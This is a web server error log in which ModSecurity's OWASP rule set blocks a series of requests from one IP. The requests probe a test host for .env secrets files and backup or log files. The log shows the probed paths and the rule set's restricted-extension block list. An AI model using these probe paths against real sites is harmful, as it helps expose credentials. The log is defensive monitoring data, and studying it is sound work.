[Mon Jan 12 15:43:33.926779 2026] [:error] [pid 1355925] [client 18.183.223.70:45852] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWUIlU7thAymmecRvtl00QAAAAI"]
[Mon Jan 12 15:43:33.926996 2026] [:error] [pid 1355925] [client 18.183.223.70:45852] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWUIlU7thAymmecRvtl00QAAAAI"]
[Mon Jan 12 15:43:33.927190 2026] [:error] [pid 1355925] [client 18.183.223.70:45852] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWUIlU7thAymmecRvtl00QAAAAI"]
[Mon Jan 12 15:43:34.644194 2026] [:error] [pid 1355924] [client 18.183.223.70:46032] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWUIltIpinFXoPzDav5wlAAAAAE"]
[Mon Jan 12 15:43:34.644400 2026] [:error] [pid 1355924] [client 18.183.223.70:46032] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWUIltIpinFXoPzDav5wlAAAAAE"]
[Mon Jan 12 15:43:34.644579 2026] [:error] [pid 1355924] [client 18.183.223.70:46032] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWUIltIpinFXoPzDav5wlAAAAAE"]
[Mon Jan 12 15:43:35.370767 2026] [:error] [pid 1355926] [client 18.183.223.70:46216] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWUIl8C2y5bYy1r2HoPzewAAAAM"]
[Mon Jan 12 15:43:35.370981 2026] [:error] [pid 1355926] [client 18.183.223.70:46216] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWUIl8C2y5bYy1r2HoPzewAAAAM"]
[Mon Jan 12 15:43:35.371152 2026] [:error] [pid 1355926] [client 18.183.223.70:46216] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWUIl8C2y5bYy1r2HoPzewAAAAM"]
[Mon Jan 12 15:43:36.088160 2026] [:error] [pid 1365295] [client 18.183.223.70:46396] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWUImA7npFhQv7HWuOad0gAAAAo"]
[Mon Jan 12 15:43:36.088474 2026] [:error] [pid 1365295] [client 18.183.223.70:46396] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWUImA7npFhQv7HWuOad0gAAAAo"]
[Mon Jan 12 15:43:36.088649 2026] [:error] [pid 1365295] [client 18.183.223.70:46396] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWUImA7npFhQv7HWuOad0gAAAAo"]
[Mon Jan 12 15:43:36.813806 2026] [:error] [pid 1365300] [client 18.183.223.70:46552] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWUImNlKlmIJBGbQbR78hwAAAAs"]
[Mon Jan 12 15:43:36.814023 2026] [:error] [pid 1365300] [client 18.183.223.70:46552] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWUImNlKlmIJBGbQbR78hwAAAAs"]
[Mon Jan 12 15:43:36.814183 2026] [:error] [pid 1365300] [client 18.183.223.70:46552] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWUImNlKlmIJBGbQbR78hwAAAAs"]
[Mon Jan 12 15:43:37.541646 2026] [:error] [pid 1362231] [client 18.183.223.70:46736] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWUImcuCkgRo958sQERiSAAAAAc"]
[Mon Jan 12 15:43:37.541846 2026] [:error] [pid 1362231] [client 18.183.223.70:46736] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWUImcuCkgRo958sQERiSAAAAAc"]
[Mon Jan 12 15:43:37.542020 2026] [:error] [pid 1362231] [client 18.183.223.70:46736] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWUImcuCkgRo958sQERiSAAAAAc"]
[Mon Jan 12 15:43:38.257927 2026] [:error] [pid 1355923] [client 18.183.223.70:46920] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWUImiE1xEBhFyXickXrtQAAAAA"]
[Mon Jan 12 15:43:38.258151 2026] [:error] [pid 1355923] [client 18.183.223.70:46920] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWUImiE1xEBhFyXickXrtQAAAAA"]
[Mon Jan 12 15:43:38.258639 2026] [:error] [pid 1355923] [client 18.183.223.70:46920] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWUImiE1xEBhFyXickXrtQAAAAA"]
[Mon Jan 12 15:43:38.989921 2026] [:error] [pid 1362233] [client 18.183.223.70:47088] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWUImn2DuVtAKraH1YOOCQAAAAk"]
[Mon Jan 12 15:43:38.990142 2026] [:error] [pid 1362233] [client 18.183.223.70:47088] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWUImn2DuVtAKraH1YOOCQAAAAk"]
[Mon Jan 12 15:43:38.990322 2026] [:error] [pid 1362233] [client 18.183.223.70:47088] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWUImn2DuVtAKraH1YOOCQAAAAk"]
[Mon Jan 12 15:43:45.559873 2026] [:error] [pid 1355923] [client 18.183.223.70:48700] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWUIoSE1xEBhFyXickXrtgAAAAA"]
[Mon Jan 12 15:43:45.560077 2026] [:error] [pid 1355923] [client 18.183.223.70:48700] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWUIoSE1xEBhFyXickXrtgAAAAA"]
[Mon Jan 12 15:43:45.560262 2026] [:error] [pid 1355923] [client 18.183.223.70:48700] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWUIoSE1xEBhFyXickXrtgAAAAA"]
[Mon Jan 12 15:43:46.284760 2026] [:error] [pid 1362233] [client 18.183.223.70:48856] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWUIon2DuVtAKraH1YOOCgAAAAk"]
[Mon Jan 12 15:43:46.284963 2026] [:error] [pid 1362233] [client 18.183.223.70:48856] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWUIon2DuVtAKraH1YOOCgAAAAk"]
[Mon Jan 12 15:43:46.285111 2026] [:error] [pid 1362233] [client 18.183.223.70:48856] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWUIon2DuVtAKraH1YOOCgAAAAk"]
[Mon Jan 12 15:43:47.011034 2026] [:error] [pid 1356126] [client 18.183.223.70:49000] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWUIozv8xyMiuvwfNnlkBAAAAAU"]
[Mon Jan 12 15:43:47.011191 2026] [:error] [pid 1356126] [client 18.183.223.70:49000] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWUIozv8xyMiuvwfNnlkBAAAAAU"]
[Mon Jan 12 15:43:47.011385 2026] [:error] [pid 1356126] [client 18.183.223.70:49000] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWUIozv8xyMiuvwfNnlkBAAAAAU"]
[Mon Jan 12 15:43:47.011563 2026] [:error] [pid 1356126] [client 18.183.223.70:49000] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWUIozv8xyMiuvwfNnlkBAAAAAU"]
[Mon Jan 12 15:43:47.740316 2026] [:error] [pid 1358564] [client 18.183.223.70:49186] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWUIox_UgGRJ4jDk47tQnAAAAAY"]
[Mon Jan 12 15:43:47.740485 2026] [:error] [pid 1358564] [client 18.183.223.70:49186] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWUIox_UgGRJ4jDk47tQnAAAAAY"]
[Mon Jan 12 15:43:47.740676 2026] [:error] [pid 1358564] [client 18.183.223.70:49186] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWUIox_UgGRJ4jDk47tQnAAAAAY"]
[Mon Jan 12 15:43:47.740839 2026] [:error] [pid 1358564] [client 18.183.223.70:49186] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWUIox_UgGRJ4jDk47tQnAAAAAY"]
[Mon Jan 12 15:43:49.190490 2026] [authz_core:error] [pid 1355926] [client 18.183.223.70:49662] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
